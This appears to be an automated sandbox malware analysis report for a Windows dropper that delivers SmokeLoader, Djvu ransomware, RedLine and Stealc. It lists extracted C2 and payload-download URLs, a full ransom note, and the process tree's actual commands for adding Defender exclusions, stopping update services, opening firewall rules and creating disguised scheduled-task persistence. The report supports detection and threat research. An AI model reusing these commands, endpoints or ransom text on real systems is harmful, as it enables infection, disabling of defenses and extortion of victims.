Analysis

  • max time kernel
    97s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-10-2023 20:12

General

  • Target

    file.exe

  • Size

    294KB

  • MD5

    a77740c2ae8564d47f72d9d81088f40c

  • SHA1

    762477bdd1e60f67e7b6b0a00effb896cfbbd67f

  • SHA256

    2193ba5c30016e0a36b4278a5d2ef1aec933744718a50f8480a73a03093ee102

  • SHA512

    b0327ecd5e1e7a5a53f786f7d781e5651fec7f969f2964728d38dc6782fe4346612e84146e48a92b69dd45f3e81396e606ce5c2f210085c33e3f3d423703d64a

  • SSDEEP

    3072:PLc22CAn25J5rWocE/uar9wpdYcOi+Hf3+5Mf63HHChjGl6KjHZ0:wDn25jWvEmampdYcw/3FiflVH

Malware Config

Extracted

Family

smokeloader

Version

2022

C2

http://onualituyrs.org/

http://sumagulituyo.org/

http://snukerukeutit.org/

http://lightseinsteniki.org/

http://liuliuoumumy.org/

http://stualialuyastrelia.net/

http://kumbuyartyty.net/

http://criogetikfenbut.org/

http://tonimiuyaytre.org/

http://tyiuiunuewqy.org/

rc4.i32
rc4.i32

Extracted

Family

djvu

C2

http://zexeq.com/lancer/get.php

http://zexeq.com/raud/get.php

Attributes
  • extension

    .mlap

  • offline_id

    FjtJkuhRHnUARRt9GnbbgUTa6ErhJq4ZM668xSt1

  • payload_url

    http://colisumy.com/dl/build2.exe

    http://zexeq.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-xN3VuzQl0a Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0804JOsie

rsa_pubkey.plain

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

C2

51.255.152.132:36011

Extracted

Family

stealc

C2

http://91.103.253.171

Attributes
  • url_path

    /ed9891f07f96bfb8.php

rc4.plain

Extracted

Family

smokeloader

Botnet

up3

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

smokeloader

Version

2020

C2

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32
rc4.i32

Signatures

  • Detected Djvu ransomware 16 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 5 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 1 TTPs 2 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 22 IoCs
  • Loads dropped DLL 3 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 11 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3128
    • C:\Users\Admin\AppData\Local\Temp\file.exe
      "C:\Users\Admin\AppData\Local\Temp\file.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:744
    • C:\Users\Admin\AppData\Local\Temp\D5ED.exe
      C:\Users\Admin\AppData\Local\Temp\D5ED.exe
      2⤵
      • Executes dropped EXE
      PID:3116
      • C:\Users\Admin\AppData\Local\Temp\D5ED.exe
        C:\Users\Admin\AppData\Local\Temp\D5ED.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:2016
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Users\Admin\AppData\Local\0ca9f462-6d84-4a9f-adb8-e98f0ece4571" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          4⤵
          • Modifies file permissions
          PID:4496
        • C:\Users\Admin\AppData\Local\Temp\D5ED.exe
          "C:\Users\Admin\AppData\Local\Temp\D5ED.exe" --Admin IsNotAutoStart IsNotTask
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          PID:4412
          • C:\Users\Admin\AppData\Local\Temp\D5ED.exe
            "C:\Users\Admin\AppData\Local\Temp\D5ED.exe" --Admin IsNotAutoStart IsNotTask
            5⤵
            • Executes dropped EXE
            PID:3272
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 568
              6⤵
              • Program crash
              PID:1596
    • C:\Users\Admin\AppData\Local\Temp\D6F8.exe
      C:\Users\Admin\AppData\Local\Temp\D6F8.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Checks processor information in registry
      PID:3820
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 1936
        3⤵
        • Program crash
        PID:2788
    • C:\Windows\system32\regsvr32.exe
      regsvr32 /s C:\Users\Admin\AppData\Local\Temp\DA16.dll
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1852
      • C:\Windows\SysWOW64\regsvr32.exe
        /s C:\Users\Admin\AppData\Local\Temp\DA16.dll
        3⤵
        • Loads dropped DLL
        PID:1688
    • C:\Users\Admin\AppData\Local\Temp\DBAD.exe
      C:\Users\Admin\AppData\Local\Temp\DBAD.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:4400
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        3⤵
          PID:2124
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
          3⤵
            PID:1532
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 412
            3⤵
            • Program crash
            PID:1288
        • C:\Users\Admin\AppData\Local\Temp\DDE1.exe
          C:\Users\Admin\AppData\Local\Temp\DDE1.exe
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:3596
          • C:\Users\Admin\AppData\Local\Temp\DDE1.exe
            C:\Users\Admin\AppData\Local\Temp\DDE1.exe
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4328
            • C:\Users\Admin\AppData\Local\Temp\DDE1.exe
              "C:\Users\Admin\AppData\Local\Temp\DDE1.exe" --Admin IsNotAutoStart IsNotTask
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:660
              • C:\Users\Admin\AppData\Local\Temp\DDE1.exe
                "C:\Users\Admin\AppData\Local\Temp\DDE1.exe" --Admin IsNotAutoStart IsNotTask
                5⤵
                • Executes dropped EXE
                PID:1456
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 568
                  6⤵
                  • Program crash
                  PID:3824
        • C:\Users\Admin\AppData\Local\Temp\AAE.exe
          C:\Users\Admin\AppData\Local\Temp\AAE.exe
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1376
          • C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
            "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:2232
            • C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
              "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
              4⤵
              • Executes dropped EXE
              • Checks SCSI registry key(s)
              • Suspicious behavior: MapViewOfSection
              PID:3124
          • C:\Users\Admin\AppData\Local\Temp\source1.exe
            "C:\Users\Admin\AppData\Local\Temp\source1.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of AdjustPrivilegeToken
            PID:3828
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              4⤵
                PID:856
            • C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe
              "C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
              3⤵
              • Executes dropped EXE
              PID:1684
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                4⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2628
                • C:\Windows\System32\Conhost.exe
                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  5⤵
                  • Executes dropped EXE
                  PID:800
              • C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe
                "C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
                4⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Checks for VirtualBox DLLs, possible anti-VM trick
                • Drops file in Windows directory
                • Modifies data under HKEY_USERS
                PID:2464
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  5⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  PID:1972
                • C:\Windows\system32\cmd.exe
                  C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                  5⤵
                    PID:960
                    • C:\Windows\system32\netsh.exe
                      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                      6⤵
                      • Modifies Windows Firewall
                      PID:3976
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    5⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    PID:2508
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    5⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    PID:1940
                  • C:\Windows\rss\csrss.exe
                    C:\Windows\rss\csrss.exe
                    5⤵
                    • Executes dropped EXE
                    PID:1072
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      6⤵
                      • Modifies data under HKEY_USERS
                      PID:1212
                    • C:\Windows\SYSTEM32\schtasks.exe
                      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                      6⤵
                      • Creates scheduled task(s)
                      PID:2756
                    • C:\Windows\SYSTEM32\schtasks.exe
                      schtasks /delete /tn ScheduledUpdate /f
                      6⤵
                        PID:3752
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        6⤵
                          PID:3848
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          6⤵
                            PID:540
                          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                            C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                            6⤵
                              PID:2304
                            • C:\Windows\SYSTEM32\schtasks.exe
                              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                              6⤵
                              • Creates scheduled task(s)
                              PID:4296
                            • C:\Windows\windefender.exe
                              "C:\Windows\windefender.exe"
                              6⤵
                                PID:4476
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                  7⤵
                                    PID:1248
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                      8⤵
                                      • Launches sc.exe
                                      PID:220
                          • C:\Users\Admin\AppData\Local\Temp\latestX.exe
                            "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
                            3⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Drops file in Program Files directory
                            PID:1288
                        • C:\Users\Admin\AppData\Local\Temp\11D4.exe
                          C:\Users\Admin\AppData\Local\Temp\11D4.exe
                          2⤵
                            PID:800
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 800 -s 344
                              3⤵
                              • Program crash
                              PID:1480
                          • C:\Users\Admin\AppData\Local\Temp\1B4A.exe
                            C:\Users\Admin\AppData\Local\Temp\1B4A.exe
                            2⤵
                            • Executes dropped EXE
                            PID:2952
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2568
                            • C:\Users\Admin\AppData\Local\Temp\1B4A.exe
                              "C:\Users\Admin\AppData\Local\Temp\1B4A.exe"
                              3⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Checks for VirtualBox DLLs, possible anti-VM trick
                              • Drops file in Windows directory
                              • Modifies data under HKEY_USERS
                              PID:1800
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                4⤵
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                PID:2384
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                4⤵
                                  PID:4588
                                  • C:\Windows\system32\netsh.exe
                                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                    5⤵
                                    • Modifies Windows Firewall
                                    PID:4716
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -nologo -noprofile
                                  4⤵
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1932
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -nologo -noprofile
                                  4⤵
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  PID:4228
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 852
                                  4⤵
                                  • Program crash
                                  PID:3760
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 900
                                3⤵
                                • Program crash
                                PID:3656
                            • C:\Windows\SysWOW64\explorer.exe
                              C:\Windows\SysWOW64\explorer.exe
                              2⤵
                              • Accesses Microsoft Outlook profiles
                              • Suspicious use of SetThreadContext
                              • Suspicious use of WriteProcessMemory
                              • outlook_office_path
                              • outlook_win_path
                              PID:3116
                            • C:\Windows\explorer.exe
                              C:\Windows\explorer.exe
                              2⤵
                                PID:3272
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                2⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:384
                              • C:\Windows\System32\cmd.exe
                                C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                2⤵
                                  PID:1528
                                  • C:\Windows\System32\sc.exe
                                    sc stop UsoSvc
                                    3⤵
                                    • Launches sc.exe
                                    PID:3288
                                  • C:\Windows\System32\sc.exe
                                    sc stop WaaSMedicSvc
                                    3⤵
                                    • Launches sc.exe
                                    PID:5020
                                  • C:\Windows\System32\sc.exe
                                    sc stop wuauserv
                                    3⤵
                                    • Launches sc.exe
                                    PID:3280
                                  • C:\Windows\System32\sc.exe
                                    sc stop bits
                                    3⤵
                                    • Launches sc.exe
                                    PID:3800
                                  • C:\Windows\System32\sc.exe
                                    sc stop dosvc
                                    3⤵
                                    • Launches sc.exe
                                    PID:4600
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                  2⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1760
                                • C:\Windows\System32\cmd.exe
                                  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                  2⤵
                                    PID:540
                                    • C:\Windows\System32\powercfg.exe
                                      powercfg /x -hibernate-timeout-ac 0
                                      3⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1008
                                    • C:\Windows\System32\powercfg.exe
                                      powercfg /x -hibernate-timeout-dc 0
                                      3⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1612
                                    • C:\Windows\System32\powercfg.exe
                                      powercfg /x -standby-timeout-ac 0
                                      3⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3624
                                    • C:\Windows\System32\powercfg.exe
                                      powercfg /x -standby-timeout-dc 0
                                      3⤵
                                        PID:1932
                                    • C:\Windows\System32\schtasks.exe
                                      C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                      2⤵
                                        PID:3964
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                        2⤵
                                          PID:4120
                                        • C:\Windows\System32\cmd.exe
                                          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                          2⤵
                                            PID:3844
                                            • C:\Windows\System32\sc.exe
                                              sc stop UsoSvc
                                              3⤵
                                              • Launches sc.exe
                                              PID:3468
                                            • C:\Windows\System32\sc.exe
                                              sc stop WaaSMedicSvc
                                              3⤵
                                              • Launches sc.exe
                                              PID:4740
                                            • C:\Windows\System32\sc.exe
                                              sc stop wuauserv
                                              3⤵
                                              • Launches sc.exe
                                              PID:4352
                                            • C:\Windows\System32\sc.exe
                                              sc stop bits
                                              3⤵
                                              • Launches sc.exe
                                              PID:2664
                                            • C:\Windows\System32\sc.exe
                                              sc stop dosvc
                                              3⤵
                                              • Launches sc.exe
                                              PID:1464
                                          • C:\Windows\System32\cmd.exe
                                            C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                            2⤵
                                              PID:1096
                                              • C:\Windows\System32\powercfg.exe
                                                powercfg /x -hibernate-timeout-ac 0
                                                3⤵
                                                  PID:4200
                                                • C:\Windows\System32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-dc 0
                                                  3⤵
                                                    PID:3960
                                                  • C:\Windows\System32\powercfg.exe
                                                    powercfg /x -standby-timeout-ac 0
                                                    3⤵
                                                      PID:4708
                                                    • C:\Windows\System32\powercfg.exe
                                                      powercfg /x -standby-timeout-dc 0
                                                      3⤵
                                                        PID:796
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                      2⤵
                                                        PID:4092
                                                      • C:\Windows\System32\conhost.exe
                                                        C:\Windows\System32\conhost.exe
                                                        2⤵
                                                          PID:1468
                                                        • C:\Windows\explorer.exe
                                                          C:\Windows\explorer.exe
                                                          2⤵
                                                            PID:3428
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4400 -ip 4400
                                                          1⤵
                                                            PID:1616
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1456 -ip 1456
                                                            1⤵
                                                              PID:580
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 800 -ip 800
                                                              1⤵
                                                                PID:736
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3820 -ip 3820
                                                                1⤵
                                                                  PID:4788
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3272 -ip 3272
                                                                  1⤵
                                                                    PID:4608
                                                                  • C:\Program Files\Google\Chrome\updater.exe
                                                                    "C:\Program Files\Google\Chrome\updater.exe"
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    PID:4388
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2952 -ip 2952
                                                                    1⤵
                                                                      PID:2144
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1800 -ip 1800
                                                                      1⤵
                                                                        PID:5024
                                                                      • C:\Windows\windefender.exe
                                                                        C:\Windows\windefender.exe
                                                                        1⤵
                                                                          PID:3264

                                                                        Network

                                                                        MITRE ATT&CK Enterprise v15

                                                                        Replay Monitor

                                                                        Loading Replay Monitor...

                                                                        Downloads

                                                                        • C:\Program Files\Google\Chrome\updater.exe

                                                                          Filesize

                                                                          5.6MB

                                                                          MD5

                                                                          bae29e49e8190bfbbf0d77ffab8de59d

                                                                          SHA1

                                                                          4a6352bb47c7e1666a60c76f9b17ca4707872bd9

                                                                          SHA256

                                                                          f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87

                                                                          SHA512

                                                                          9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

                                                                        • C:\Program Files\Google\Chrome\updater.exe

                                                                          Filesize

                                                                          5.6MB

                                                                          MD5

                                                                          bae29e49e8190bfbbf0d77ffab8de59d

                                                                          SHA1

                                                                          4a6352bb47c7e1666a60c76f9b17ca4707872bd9

                                                                          SHA256

                                                                          f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87

                                                                          SHA512

                                                                          9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

                                                                        • C:\ProgramData\mozglue.dll

                                                                          Filesize

                                                                          593KB

                                                                          MD5

                                                                          c8fd9be83bc728cc04beffafc2907fe9

                                                                          SHA1

                                                                          95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                          SHA256

                                                                          ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                          SHA512

                                                                          fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                        • C:\ProgramData\mozglue.dll

                                                                          Filesize

                                                                          593KB

                                                                          MD5

                                                                          c8fd9be83bc728cc04beffafc2907fe9

                                                                          SHA1

                                                                          95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                          SHA256

                                                                          ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                          SHA512

                                                                          fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                        • C:\ProgramData\nss3.dll

                                                                          Filesize

                                                                          2.0MB

                                                                          MD5

                                                                          1cc453cdf74f31e4d913ff9c10acdde2

                                                                          SHA1

                                                                          6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                          SHA256

                                                                          ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                          SHA512

                                                                          dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

                                                                          Filesize

                                                                          1KB

                                                                          MD5

                                                                          fc2ea567844ba08e104b07aeded6139c

                                                                          SHA1

                                                                          d7d71973886a0318baa8967aec8a90aa1f21d738

                                                                          SHA256

